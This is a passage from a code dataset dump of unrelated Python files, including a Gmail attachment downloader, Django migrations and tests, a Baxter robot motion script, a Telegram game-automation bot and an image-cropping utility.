var.ui.btnBajaCli.clicked.connect(clients.Clientes.bajaCliente)
var.ui.btnModifCli.clicked.connect(clients.Clientes.modifCliente)
var.ui.btnReloadCli.clicked.connect(clients.Clientes.reloadCli)
var.ui.btnBuscarCli.clicked.connect(clients.Clientes.buscarCli)
var.ui.btnAltaProd.clicked.connect(Products.Products.altaProducto)
var.ui.btnLimpiarProd.clicked.connect(Products.Products.limpiarProd)
var.ui.btnBajaProd.clicked.connect(Products.Products.BajaProd)
var.ui.btnModifProd.clicked.connect(Products.Products.ModificarProd)
var.ui.btnSalirProd.clicked.connect(events.Eventos.Salir)
var.ui.btnCalendario.clicked.connect(clients.Clientes.abrirCalendar)
var.ui.btnFacturar.clicked.connect(ventas.Ventas.altafactura)
var.ui.btnAnular.clicked.connect(ventas.Ventas.BajaFactura)
var.ui.btnRefresh.clicked.connect(ventas.Ventas.reloadFact)
var.ui.btnBuscarFact.clicked.connect(ventas.Ventas.buscarfacClientes)
var.ui.btnAceptarventa.clicked.connect(ventas.Ventas.venta)
var.ui.btnCancelar.clicked.connect(ventas.Ventas.BajaVenta)
var.ui.BtnControlStock.clicked.connect(Products.Products.ControlStock)
var.ui.BtnReloadProd.clicked.connect(conexion.Conexion.mostrarProducts)
var.ui.BtnDescuento.clicked.connect(ventas.Ventas.Descuento)
"""
Botones proveedores
"""
var.ui.btnAltaProv.clicked.connect(provider.Provider.altaProveedor)
var.ui.TableProveedores.clicked.connect(provider.Provider.cargarProd)
var.ui.TableProveedores.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.btnSalirProv.clicked.connect(events.Eventos.Salir)
conexion.Conexion.mostrarProvedrores()
var.ui.btnBajaPrd.clicked.connect(provider.Provider.BajaProv)
var.ui.btnModifCli.clicked.connect(provider.Provider.ModificarProd)
var.ui.btnProv.clicked.connect(provider.Provider.limpiarProv)
"""
Conexion con los eventos de las tablas clientes, productos,facturacion
"""
var.ui.tableCli.clicked.connect(clients.Clientes.cargarCli)
var.ui.tableCli.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.tableProd.clicked.connect(Products.Products.cargarProd)
var.ui.tableProd.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.tableFechaFact.clicked.connect(ventas.Ventas.cargarFactura)
var.ui.tableFechaFact.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.tableFechaFact.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.tabFact.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
var.ui.tableFechaFact.clicked.connect(ventas.Ventas.mostrarVentas)
"""
ToolBar Y Menubar
"""
var.ui.ToolbarSalir.triggered.connect(events.Eventos.Salir)
var.ui.ToolBarBackup.triggered.connect(events.Eventos.Backup)
var.ui.ToolBarAbrirDir.triggered.connect(events.Eventos.AbrirDir)
var.ui.ToolBarPrinter.triggered.connect(events.Eventos.AbrirPrinter)
var.ui.ToollBarRecBackup.triggered.connect(events.Eventos.restaurarBD)
var.ui.actionSalir.triggered.connect(events.Eventos.Salir)
var.ui.actionImportar_Datos.triggered.connect(events.Eventos.ImportarDatos)
"""
Satus Bar
"""
var.ui.statusBar.addPermanentWidget(var.ui.lblstatus, 1)
var.ui.statusBar.addPermanentWidget(var.ui.lblstatusdate, 2)
var.ui.lblstatus.setStyleSheet('QLabel {color: red; font: bold;}')
var.ui.lblstatus.setText('Bienvenido a 2º DAM')
fecha = date.today()
var.ui.lblstatusdate.setStyleSheet('QLabel {color: black; font: bold;}')
var.ui.lblstatusdate.setText(fecha.strftime('%A %d de %B del %Y'))
var.ui.btnBajaCli.clicked.connect(Products.Products.altaProducto)
'''
módulos de impresión
'''
var.ui.menubarReportCli.triggered.connect(printer.Printer.reportCli)
var.ui.MenubarReportProd.triggered.connect(printer.Printer.reportProduc)
var.ui.MenuBarReportFac.triggered.connect(printer.Printer.reportFac)
var.ui.actionListado_Proveedores.triggered.connect(printer.Printer.ReportProvedorees)
"""
módulos conexion base datos
"""
conexion.Conexion.db_connect(var.filebd)
conexion.Conexion.mostrarClientes()
conexion.Conexion.mostrarProducts()
conexion.Conexion.mostrarFacturas()
var.ui.TabWidget.setCurrentIndex(0)
def closeEvent(self, event):
if event:
events.Eventos.Salir(event)
if __name__ == '__main__':
app = QtWidgets.QApplication([])
window = Main()
window.showMaximized()
sys.exit(app.exec())
|
10,514 | 8172ce93f6d8609e51259a6cc10752e04ba9159f | #!/usr/bin/python2
from __future__ import print_function
import httplib2
import oauth2client # $ pip install google-api-python-client
import os
import base64
import time
import email
from googleapiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from googleapiclient import errors
UPDATE_INTERVAL = 5 # seconds
NEW_LABEL_ID = None # Gmail label ID of 'new' label
# command line arguments
try:
import argparse
parser = argparse.ArgumentParser(parents=[tools.argparser])
parser.add_argument('-a', '--all', action='store_true', dest='download_all', default='false', help='Download all attachments (else only download new)')
parser.add_argument('-l', '--label', required=True, help='Gmail label to use after attachment is downloaded (or label to download attachments from if --all is used)')
parser.add_argument('-d', '--directory', default='.', help='Specify parent directory in which download directory will be created')
flags = parser.parse_args()
except ImportError:
flags = None
SCOPES = 'https://www.googleapis.com/auth/gmail.modify'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Packet Downloader'
# Gmail authentication
def get_credentials():
# home_dir = os.path.expanduser('~')
# credential_dir = os.path.join(home_dir, '.credentials')
credential_dir = './.credentials'
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir, 'credentials.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
# Gmail advanced search
def ListMessagesMatchingQuery(service, user_id, query=''):
try:
response = service.users().messages().list(userId=user_id, q=query).execute()
messages = []
if 'messages' in response:
messages.extend(response['messages'])
while 'nextPageToken' in response:
page_token = response['nextPageToken']
response = service.users().messages().list(userId=user_id, q=query, pageToken=page_token).execute()
messages.extend(response['messages'])
return messages
except errors.HttpError, error:
print('An error occurred: %s' % error)
# Download message body and attachment
def GetData(service, user_id, msg_id, prefix=""):
sbd_filename = ''
csv_filename = 'packets.csv'
try:
message = service.users().messages().get(userId=user_id, id=msg_id).execute()
for part in message['payload']['parts']:
if part['filename']:
sbd_filename = message['internalDate'] + '.sbd'
if not sbd_filename is '':
if 'data' in part['body']:
data=part['body']['data']
else:
att_id=part['body']['attachmentId']
att=service.users().messages().attachments().get(userId=user_id, messageId=msg_id,id=att_id).execute()
data=att['data']
file_data = base64.urlsafe_b64decode(data.encode('UTF-8'))
sbd_dl_path = os.path.join(prefix, 'sbd', 'new', sbd_filename)
csv_dl_path = os.path.join(prefix, csv_filename)
if not os.path.exists(sbd_dl_path) and not os.path.exists(os.path.join(prefix, 'sbd', sbd_filename)):
#download individual sbd
with open(sbd_dl_path, 'w') as f:
f.write(file_data)
f.close()
#append contents to packets.csv
with open(csv_dl_path, 'a') as f:
f.write(file_data + '\n')
f.close()
record('Downloaded ' + sbd_dl_path)
else:
record('Skipped ' + sbd_dl_path)
except errors.HttpError, error:
print('An error occurred: %s' % error)
try:
if not sbd_filename is '':
message = service.users().messages().get(userId=user_id, id=msg_id, format='raw').execute()
txt_file = sbd_filename[:-3] + 'txt'
txt_path = os.path.join(prefix, 'txt', txt_file)
if message['raw']:
if not os.path.exists(txt_path):
data=message['raw']
file_data = base64.urlsafe_b64decode(data.encode('UTF-8'))
msg = email.message_from_string(file_data)
for part in msg.walk():
if part.get_content_type() == 'text/plain':
msg_txt = part.get_payload()
with open(txt_path, 'w') as f:
f.write(msg_txt)
f.close()
record('Downloaded ' + txt_path)
else:
record('Skipped ' + txt_path)
except errors.HttpError, error:
print('An error occurred: %s' % error)
# create label object
def CreateLabel(service, user_id, label_object):
try:
label = service.users().labels().create(userId=user_id, body=label_object).execute()
return label
except errors.HttpError, error:
print('An error occurred: %s' % error)
# make actual label in Gmail
def MakeLabel(label_name, mlv='show', llv='labelShow'):
label = {'messageListVisibility': mlv,
'name': label_name,
'labelListVisibility': llv}
return label
# add/remove labels from email
def ModifyMessage(service, user_id, msg_id, msg_labels):
try:
message = service.users().messages().modify(userId=user_id, id=msg_id, body=msg_labels).execute()
label_ids = message['labelIds']
return message
except errors.HttpError, error:
print('An error occurred: %s' % error)
# set which labels to add/remove
def CreateMsgLabels(new_label_id, label_id):
return {'removeLabelIds': [new_label_id], 'addLabelIds': [label_id]}
# use to find label ID of 'new' label (only used on initial run for each new Gmail account)
def ListLabels(service, user_id):
try:
response = service.users().labels().list(userId=user_id).execute()
labels = response['labels']
return labels
except errors.HttpError, error:
print('An error occurred: %s' % error)
# log data and print to screen
def record(text):
localtime = time.asctime(time.localtime(time.time()))
log_path = os.path.join(flags.directory, flags.label, 'log.txt')
with open(log_path, 'a') as log:
log.write(localtime + '\t' + text + '\n')
log.close()
print(localtime + '\t' + text)
def main():
# Gmail authentication
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
check = True
label_exists = False
# retrieve list of Gmail labels
labels = ListLabels(service, 'me')
for label in labels:
# check if specified label exists
if label['name'] == flags.label:
label_id = label['id']
label_exists = True
# get label_ID of 'new' label
elif label['name'] == 'new':
NEW_LABEL_ID = label['id']
if flags.directory is '.':
dir_path = os.path.join(os.getcwd(), flags.label)
else:
dir_path = os.path.join(flags.directory, flags.label)
# check if directory/logfile must be created
if label_exists is True or flags.download_all == 'false':
if not os.path.exists(dir_path):
os.makedirs(dir_path)
record('Created directory ' + dir_path)
log_path = os.path.join(dir_path, 'log.txt')
if not os.path.exists(log_path):
open(log_path, 'w').close()
sbd_path = os.path.join(dir_path, 'sbd')
if not os.path.exists(sbd_path):
os.makedirs(sbd_path)
record('Created directory ' + sbd_path)
sbd_dl_path = os.path.join(sbd_path, 'new')
if not os.path.exists(sbd_dl_path):
os.makedirs(sbd_dl_path)
record('Created directory ' + sbd_dl_path)
txt_path = os.path.join(dir_path, 'txt')
if not os.path.exists(txt_path):
os.makedirs(txt_path)
record('Created directory ' + txt_path)
while check is True:
# download all packets with specified label
if flags.download_all is True:
if label_exists is True:
messages = ListMessagesMatchingQuery(service,'me', 'label:' + flags.label)
if not messages:
record('No messages found.')
else:
for message in messages:
GetData(service, 'me', message['id'], dir_path)
else:
localtime = time.asctime(time.localtime(time.time()))
print(localtime + '\tLabel \'' + flags.label + '\' does not exist.')
check = False
# download all new packets and relabel with specified label
else:
messages = ListMessagesMatchingQuery(service,'me', 'label:new')
if not messages:
record('No messages found.')
else:
if label_exists is False:
record('Creating label ' + flags.label)
label_object = MakeLabel(flags.label, mlv='show', llv='labelShow')
label = CreateLabel(service, 'me', label_object)
label_id = label['id']
label_exists = True
for message in messages:
GetData(service, 'me', message['id'], dir_path)
msg_label = CreateMsgLabels(NEW_LABEL_ID, label_id)
ModifyMessage(service, 'me', message['id'], msg_label)
if check is True:
time.sleep(UPDATE_INTERVAL)
if __name__ == '__main__':
main()
|
10,515 | d0ed4bfa75db659d8f3095185b1f2c2ab3c668ec | import pygame
white = ( 255, 255, 255)
black = ( 0, 0, 0)
class Car(pygame.sprite.Sprite):
def __init__(self):
super(Car,self).__init__()
self.surf = pygame.Surface((75,25))
self.surf.fill(white)
self.rect = self.surf.get_rect() |
10,516 | 07eb4bbdf0943bd5e83afc487d1930d0bc143ab6 | # Generated by Django 2.1.4 on 2019-02-23 09:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0008_auto_20190223_1127'),
]
operations = [
migrations.CreateModel(
name='Station',
fields=[
('station_id', models.IntegerField(primary_key=True, serialize=False)),
('station_name', models.CharField(max_length=20)),
('address', models.CharField(max_length=100)),
('city', models.CharField(max_length=20)),
('district', models.CharField(max_length=20)),
('contact_no', models.IntegerField()),
],
),
]
|
10,517 | a6f895fb1596fe8a62362f3337cf4e52b2fe4349 | import rospy
import baxter_interface
from baxter_interface import Gripper, Limb, Head
import time
rospy.init_node('test')
left = Limb('left')
right = Limb('right')
leftg = Gripper('left')
head = Head()
def dab():
right.move_to_neutral()
left.move_to_neutral()
dableft = {'left_w0': -0.10316020798529407, 'left_w1': 0.0790000105760988, 'left_w2': -0.0011504855909140602,
'left_e0': -0.006519418348513008, 'left_e1': -0.039883500485020755,
'left_s0': 0.29682528245582757, 'left_s1': -0.6181942575178218}
dabright = {'right_s0': 0.6810874698211237, 'right_s1': -0.4935583185021319,
'right_w0': -0.008820389530341128, 'right_w1': 0.3321068405771921, 'right_w2': 0.0038349519697135344,
'right_e0': 1.749121593386343, 'right_e1': 1.6333060439009943}
left.move_to_joint_positions(dableft, timeout = 2)
head.set_pan(-0.8, speed=.5)
right.move_to_joint_positions(dabright, timeout = 6)
head.command_nod()
time.sleep(1)
right.move_to_neutral()
left.move_to_neutral()
def pickUp3Point2():
above3point2 = {'left_w0': 0.0, 'left_w1': 1.3157720208087136, 'left_w2': -0.002684466378799474,
'left_e0': 0, 'left_e1': 0.7850146682003605,
'left_s0': -0.73, 'left_s1': -0.6293156182299909}
down3point2 = { 'left_w0': 0.13077186216723152, 'left_w1': 1.1, 'left_w2': 0.0015339807878854137,
'left_e0': -0.16605342028859604, 'left_e1': 0.7,
'left_s0': -0.62, 'left_s1': -0.28}
Gripper.calibrate(leftg)
leftg.open()
time.sleep(1)
left.move_to_joint_positions(above3point2, timeout = 4)
left.move_to_joint_positions(down3point2, timeout = 4)
leftg.open()
leftg.close()
time.sleep(1)
left.move_to_joint_positions(above3point2)
leftg.open()
head.set_pan(0, speed=100)
pickUp3Point2()
dab()
|
10,518 | a1a99120403fe53a10c8575af0c5951fa56849dd | #
# Script to send outgoing notifications
#
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db import connection
from datetime import timedelta
import sys
from postgresqleu.util.messaging import ProviderCache
from postgresqleu.util.messaging.sender import send_pending_messages
from postgresqleu.confreg.models import NotificationQueue
class Command(BaseCommand):
help = 'Send pending notifications'
class ScheduledJob:
scheduled_interval = timedelta(minutes=10)
@classmethod
def should_run(self):
return NotificationQueue.objects.filter(time__lte=timezone.now()).exists()
def handle(self, *args, **options):
curs = connection.cursor()
curs.execute("SELECT pg_try_advisory_lock(931779)")
if not curs.fetchall()[0][0]:
raise CommandError("Failed to get advisory lock, existing send_notifications process stuck?")
providers = ProviderCache()
ok, numsent = send_pending_messages(providers)
if numsent:
print("Sent {} notification messages".format(numsent))
if not ok:
sys.exit(1)
|
10,519 | 66803f7384ae7cda3fc32213e0f0dc1311398427 | from django.test import TestCase
from .models import (TimelineSlide)
import json
# Test data
test_data_headline = 'Milk Marketing Board established'
test_data_text = 'The Milk Marketing Board (MMB) was a producer-led ' \
'organisation established in 1933-34 via the Agriculture ' \
'Marketing Act (1933). It brought stability and financial ' \
'security to dairy farmers by negotiating contracts with ' \
'milk purchasers on behalf of all 140,000 milk producers. ' \
'At a time of deep agricultural depression, when most ' \
'farming produce faced fierce competition from imports, ' \
'it contributed to a significant growth in UK dairy ' \
'farming.'
class TimelineSlideTestCase(TestCase):
def setUp(self):
TimelineSlide.objects.create(
unique_id='F001',
start_date_year=1933,
start_date_month=1,
start_date_day=1,
end_date_year=1933,
end_date_month=12,
end_date_day=1,
headline=test_data_headline,
text=test_data_text
)
def test_serialise_start_date(self):
slide = TimelineSlide.objects.get(unique_id='F001')
test_date = {'display_date': 1933, 'year': 1933, 'month': 1, 'day': 1}
self.assertEqual(slide.serialise_start_date(), test_date)
def test_serialise_end_date(self):
slide = TimelineSlide.objects.get(unique_id='F001')
test_date = {"year": 1933, 'month': 12, 'day': 1}
self.assertEqual(slide.serialise_end_date(), test_date)
def test_serialise_text(self):
slide = TimelineSlide.objects.get(unique_id='F001')
test_text = {
"headline": test_data_headline,
"text": test_data_text
}
self.assertEqual(slide.serialise_text(), test_text)
def test_get_timeline_data(self):
slide = TimelineSlide.objects.get(unique_id='F001')
test_data = {}
test_data['start_date'] = {"year": 1933, 'month': 1, 'day': 1,
'display_date': 1933}
test_data['display_date'] = "1933"
test_data['end_date'] = {"year": 1933, 'month': 12, 'day': 1}
test_data['text'] = {
"headline": test_data_headline,
"text": test_data_text
}
test_data['unique_id'] = 'F001'
self.assertEqual(slide.get_timeline_data(), test_data)
# test JSON conversion
self.assertEqual(len(slide.to_timeline_json()),
len(json.dumps(test_data)))
|
10,520 | de6e2f08858c68bb8a2d1a327e9459ed74f38f93 | from .models import *
from django import forms
def createHomePage(homePageForm):
try:
homePage = HomePage.saveFromForm(homePageForm)
return homePage
except Exception as e:
print(e)
def createSiteInfos(siteInfoFormSet, homePage):
for form in siteInfoFormSet:
if form.cleaned_data['image']:
SiteInfo(homePage=homePage,
image=form.cleaned_data['image'],
text=form.cleaned_data['text']).save()
|
10,521 | 90de9af7411d0a5ff230180b64feb7a2720eff51 | '''
#############################################################################################################
4. <<체육복>>
[문제 설명]
점심시간에 도둑이 들어, 일부 학생이 체육복을 도난당했습니다. 다행히 여벌 체육복이 있는 학생이 이들에게 체육복을 빌려주려 합니다. 학생들의 번호는 체격 순으로 매겨져 있어, 바로 앞번호의 학생이나 바로 뒷번호의 학생에게만 체육복을 빌려줄 수 있습니다. 예를 들어, 4번 학생은 3번 학생이나 5번 학생에게만 체육복을 빌려줄 수 있습니다. 체육복이 없으면 수업을 들을 수 없기 때문에 체육복을 적절히 빌려 최대한 많은 학생이 체육수업을 들어야 합니다.
전체 학생의 수 n, 체육복을 도난당한 학생들의 번호가 담긴 배열 lost, 여벌의 체육복을 가져온 학생들의 번호가 담긴 배열 reserve가 매개변수로 주어질 때, 체육수업을 들을 수 있는 학생의 최댓값을 return 하도록 solution 함수를 작성해주세요.
[제한사항]
전체 학생의 수는 2명 이상 30명 이하입니다.
체육복을 도난당한 학생의 수는 1명 이상 n명 이하이고 중복되는 번호는 없습니다.
여벌의 체육복을 가져온 학생의 수는 1명 이상 n명 이하이고 중복되는 번호는 없습니다.
여벌 체육복이 있는 학생만 다른 학생에게 체육복을 빌려줄 수 있습니다.
여벌 체육복을 가져온 학생이 체육복을 도난당했을 수 있습니다. 이때 이 학생은 체육복을 하나만 도난당했다고 가정하며, 남은 체육복이 하나이기에 다른 학생에게는 체육복을 빌려줄 수 없습니다.
[입출력 예]
n lost reserve return
5 [2, 4] [1, 3, 5] 5
5 [2, 4] [3] 4
3 [3] [1] 2
#############################################################################################################
'''
#일부 테스트 통과 못한 로직
def solution(n, lost, reserve):
save = []
resetlost = set(lost) - set(reserve)
resetreserve = set(reserve) - set(lost) # 여분있는 사람이 도난 당했을 경우 빌려줄 수 없으므로 삭제
if len(resetreserve) <= len(resetlost):
for lostst in resetlost:
for reservest in resetreserve:
if lostst == reservest - 1 or lostst == reservest + 1:
save.append(reservest)
else:
for lostst in resetlost:
for reservest in resetreserve:
if reservest == lostst - 1 or reservest == lostst + 1:
save.append(lostst)
a = len(list(set(save))) #
answer = n - len(lost) + a
return answer
#최종 풀이
def solution(n, lost, reserve):
resetlost = set(lost) - set(reserve)
resetreserve = set(reserve) - set(lost) # 여분있는 사람이 도난 당했을 경우 빌려줄 수 없으므로 삭제
for i in resetreserve:
if i - 1 in resetlost:
resetlost.remove(i - 1)
elif i + 1 in resetlost:
resetlost.remove(i + 1)
return n - len(resetlost) |
10,522 | 6a5f383bb338c6900ecbd539388acc1f1ad91e11 | from telethon import TelegramClient, sync, events
from telethon.tl.custom.conversation import Conversation
from random import randint
import asyncio
import cwCommonUtils
from cwConversation import ChatWarsConversation
# 🏰Castle ⚖Exchange 📦Stock 70 x 1000💰 [selling]
class ChatWarsHelper(dict):
chat_me = 'self'
chat_apronhammer = 'apronhammer_bot'
chat_chatwars = 'chtwrsbot'
chat_api_testing = -329868035
on = False
def __init__(self, client):
dict.__init__(self, client=client)
self.client = client
self.conversation = ChatWarsConversation(self.client, self.chat_chatwars)
#async def Deposit?
async def Craft(self, item_name, qtty):
item_id = cwCommonUtils.GetItemId(item_name)
result = await self.CraftRecursive(item_id, str(qtty))
if result is True:
print('Crafted: ' + item_name + ' x ' + str(qtty))
else:
print('NO PUDE CRAFTEAR')
async def CraftRecursive(self, item_id, qtty):
try:
response = (await self.conversation.sayCraft(item_id, qtty)).raw_text
await asyncio.sleep(2)
if cwCommonUtils.TestCraftResult(response) == 'REQUIRED':
response = cwCommonUtils.GetRequiredItemsFromCraftResult(response, ' ')
for requiered_item in response:
item_requiered_id = cwCommonUtils.GetItemIdFromCraftOrder(requiered_item)
item_requiered_qtty = cwCommonUtils.GetItemQttyFromCraftOrder(requiered_item)
required_craft_result = await self.CraftRecursive(item_requiered_id, item_requiered_qtty)
if required_craft_result == False: return False
return True
elif cwCommonUtils.TestCraftResult(response) == 'MANA':
return False
elif cwCommonUtils.TestCraftResult(response) == 'CRAFTED':
return True
return False
except Exception as err:
print('Error in CraftRecursive: ')
print(str(err))
async def Hide(self, item_name):
try:
print('=> hiding: ' + item_name)
item_quantity = await self.conversation.GetItemQuantity(item_name)
print(item_name + ' to hide: ' + str(item_quantity))
if item_quantity > 0:
exchange = await self.conversation.GetExchange()
remove_hash = await self.conversation.GetRemoveHashFromExchange(item_name, exchange)
if remove_hash != None:#ir una sola vez al exchange y obtener hidden_quantity y remove hash
hidden_quantity = await self.conversation.GetItemQuantityFromExchange(item_name, exchange)
print(item_name + ' already in exchange: ' + str(hidden_quantity))
removed = await self.conversation.RemoveItemFromExchange(remove_hash)
if removed:
total_quantity = item_quantity + hidden_quantity
else:
print('no' + item_name + ' in exchange: ')
total_quantity = item_quantity
await asyncio.sleep(2)
await self.conversation.TryToSell(item_name, total_quantity)
except Exception as err:
print('Error in Hide: ')
print(str(err))
async def cwNewMessageHandler(self, event: events.NewMessage.Event):
if self.on == False:
return
try:
if event and event.chat:
chat_name = event.chat.title if hasattr(event.chat, 'title') else event.chat.username
print('=> cwNewMessageHandler message from "' + str(chat_name) + '" :' + str(event.raw_text))
if self.TestHideItem(str(event.raw_text), 'thread'):
await self.HideItem('thread')
if self.TestCraftRecursive(str(event.raw_text)):
order = cwCommonUtils.GetItemFromOrder(str(event.raw_text), 'recursive')
item_id = cwCommonUtils.GetItemIdFromCraftOrder(order)
item_qtty = cwCommonUtils.GetItemQttyFromCraftOrder(order)
item_name = cwCommonUtils.GetItemName(item_id)
await self.Craft(item_name, item_qtty)
if self.TestPota(str(event.raw_text), None):
await self.conversation.sayPota('/use_p13')#mana
except Exception as err:
print('Error in cwNewMessageHandler: ')
print(str(err))
#async def HideHiddenItems(self):
def TestHideItem(self, text, item_name):
return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['hide', item_name], text)
def TestChangeItem(self, text, item_name):
return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['shop', 'change', item_name], text)
def TestCraftRecursive(self, text):
return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['craft', 'recursive'], text)
def TestPota(self, text, item_name=None):
if isinstance(item_name, str):
return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['pota', item_name], text)
else:
return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['pota'], text)
async def HideItem(self, item_name):
await self.Hide(item_name)
### TODO: cuando lee un 404 Not Found o el ¯\_(ツ)_/¯ en el chtwrsbot intenta corregir?
### TODO: -.,(@)-·¯
### TODO:
### TODO:
### TODO: |
10,523 | 4ed0cb5cbc58e596bb5467441082538c30993e01 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 22 11:25:28 2020
@author: Brendon McHugh
Question 1(b) of Lab03
Here, we use gaussian quadrature to calculate the
probability of blowing snow based on the average
hourly windspeed at 10m, the snow surface age
and the average hourly temperature.
"""
# Import numpy, matplotlib, gaussxw
import numpy as np
import matplotlib.pyplot as plt
from gaussxw import gaussxwab
def prob_blowing_snow(u10, Ta, th, N):
"""
Function that uses gaussian quadrature to calculate
the probability of blowing snow
Parameters
----------
u10 : float
Average hourly windspeed at 10m.
Ta : float
Average hourly temperature
th : float
Snow surface age.
N : int
Number of sample points.
Returns
-------
float
Probability of blowing snow in these conditions.
"""
# Mean and standard deviation wind speed
ubar = 11.2 + 0.365*Ta + 0.00706*Ta**2 + 0.9*np.log(th)
delta = 4.3 + 0.145*Ta + 0.00196*Ta**2
# Integrand as a function u, wind speed
integrand = lambda u : np.exp(-(ubar-u)**2/(2*delta**2))
# Calculation of integral using gaussian quadrature
s, w = gaussxwab(N, 0, u10)
integral = np.sum(w*integrand(s))
# Normalize integral to calculate probability
return integral/(np.sqrt(2*np.pi)*delta)
# Number of sample points
N = 100
# Values of u10 and th to investigate
u10_vals = [6,8,10]
th_vals = [24,48,72]
# Values of Ta to plot
Ta = np.linspace(-30, 10, 100)
# Array to store probability values
P_bs = np.zeros(len(Ta))
# Colours and line types for plotting
colours = ('r', 'g', 'b')
lines = ('.', '-', ':')
# Create plot of proability of blowing snow vs temperature
plt.figure()
for (u10, colour) in zip(u10_vals, colours):
for (th, line) in zip(th_vals, lines):
P_bs = prob_blowing_snow(u10, Ta, th, N)
plot_str = colour + line
plt.plot(Ta, P_bs, plot_str, label=r'$u_{10}$ = %.4f, $t_h$ = %.4f'%(u10, th))
plt.xlabel('Average Hourly Temperature (Degrees C)')
plt.ylabel('Probability of Blowing Snow')
plt.legend()
plt.grid(True)
plt.title('Probability of Blowing Snow vs Temperature')
plt.savefig('ProbSnow_Temp_1b')
# Create log plot of proability of blowing snow vs temperature
plt.figure()
for (u10, colour) in zip(u10_vals, colours):
for (th, line) in zip(th_vals, lines):
P_bs = prob_blowing_snow(u10, Ta, th, N)
plot_str = colour + line
plt.semilogy(Ta, P_bs, plot_str, label=r'$u_{10}$ = %.4f, $t_h$ = %.4f'%(u10, th))
plt.xlabel('Average Hourly Temperature (Degrees C)')
plt.ylabel('Probability of Blowing Snow')
plt.legend()
plt.grid(True)
plt.title('Probability of Blowing Snow vs Temperature')
plt.savefig('ProbSnow_Temp_Semilogy_1b')
|
10,524 | 8ca05fa2f5e33923804ddc983bf9cdb183fa268a | from os import path
from cv2 import cv2
from Katna.image import Image
from glob import glob
import operator
from PIL import Image as pil
from util import conf
from util.log_it import get_logger
logger = get_logger(__name__)
img_module = Image()
thumbnail_height = 180
thumbnail_width = 360
banner_ratios = [ '%d:1' % width for width in range(3,7)]
thumbnail_ratios = [ '4:3', '5:3']
movie_thumbnails =['fanart.jpg']
movie_thumbnail_order = [
'clearart.png',
'logo.png',
'folder.jpg',
'poster.jpg',
'disc.png'
]
movie_banners = [
'logo.png'
]
movie_banner_order = [
'fanart.jpg',
'folder.jpg',
'poster.jpg',
'disc.png'
]
show_thumbnails = ['fanart.jpg']
show_thumbnail_order = [
'clearart.png',
'landscape.jpg',
'logo.png',
'banner.jpg',
'folder.jpg',
'poster.jpg',
'disc.png'
]
show_banners = [
'banner.jpg',
'logo.png'
]
show_banner_order = [
'clearart.png',
'landscape.jpg',
'fanart.jpg',
'folder.jpg',
'poster.jpg',
'disc.png'
]
def process_images(content_root):
output_path = content_root.replace(conf.FINAL_DIR,conf.ASSETS_DIR)
images_file_path = content_root.replace(conf.FINAL_DIR, conf.ASSET_TMP_DIR)
if 'TV Shows' in images_file_path:
process_type(images_file_path, show_banners, show_banner_order, output_path, banner_ratios, 'banner')
process_type(images_file_path, show_thumbnails, show_thumbnail_order, output_path, thumbnail_ratios, 'thumbnail')
else:
process_type(images_file_path, movie_banners, movie_banner_order, output_path, banner_ratios, 'banner')
process_type(images_file_path, movie_thumbnails, movie_thumbnail_order, output_path, thumbnail_ratios, 'thumbnail')
def process_type(images_file_path, acceptable_pics, crop_pics, file_output_path, ratios, output_name):
accept_pic = next((path.join(images_file_path,img) for img in acceptable_pics if path.exists(path.join(images_file_path,img))), None)
if accept_pic:
logger.info('Found accepted %s - starting resize' % output_name)
resize(accept_pic, file_output_path, output_name)
else:
logger.info('No accepted %s - starting crop' % output_name)
cropable_pics = [ path.join(images_file_path,img) for img in crop_pics if path.exists(path.join(images_file_path,img))]
crop_images(cropable_pics, ratios, file_output_path, output_name)
def resize(img_path, output_path, output_file_name):
image = pil.open(img_path)
ext = img_path.split('.')[-1]
if "clearart" in img_path or "fanart" in img_path:
image = image.resize([int(0.32 * s) for s in image.size])
image.save(path.join(output_path, '%s.%s' % (output_file_name, ext)), quality=82, optimize=True)
def crop_images(img_paths, ratios, file_output_path, file_output_name):
crop_result = [ (img, img_module.crop_image_with_aspect(
file_path=img,
crop_aspect_ratio=ratio,
num_of_crops=1,
down_sample_factor=5
)) for img in img_paths
for ratio in ratios
]
best_crop = max(crop_result, key=lambda res: res[1][0].score if res[1] else 0)
logger.info('Best crop from %s' % best_crop[0])
img_loaded = cv2.imread(best_crop[0])
ext_pic = best_crop[0].split('.')[-1]
img_module.save_crop_to_disk(best_crop[1][0], img_loaded,
file_path=file_output_path,
file_name= file_output_name,
file_ext='.%s' % ext_pic,
)
path_output = path.join(file_output_path, "%s.%s" % (file_output_name, ext_pic))
image = pil.open(path_output)
image.save(path.join(path_output), quality=82, optimize=True)
|
10,525 | 9f10849077f41f99fe45d9bf4a13432d663b1ca3 | from .q_learner import QLearner
from .coma_learner import COMALearner
REGISTRY = {}
REGISTRY["q_learner"] = QLearner
REGISTRY["coma_learner"] = COMALearner
|
10,526 | a71561117c200d73ab93bc7e6ed61dff9c90a713 | from app.api.v2.managers.base_api_manager import BaseApiManager
from app.api.v2.responses import JsonHttpNotFound
class ContactApiManager(BaseApiManager):
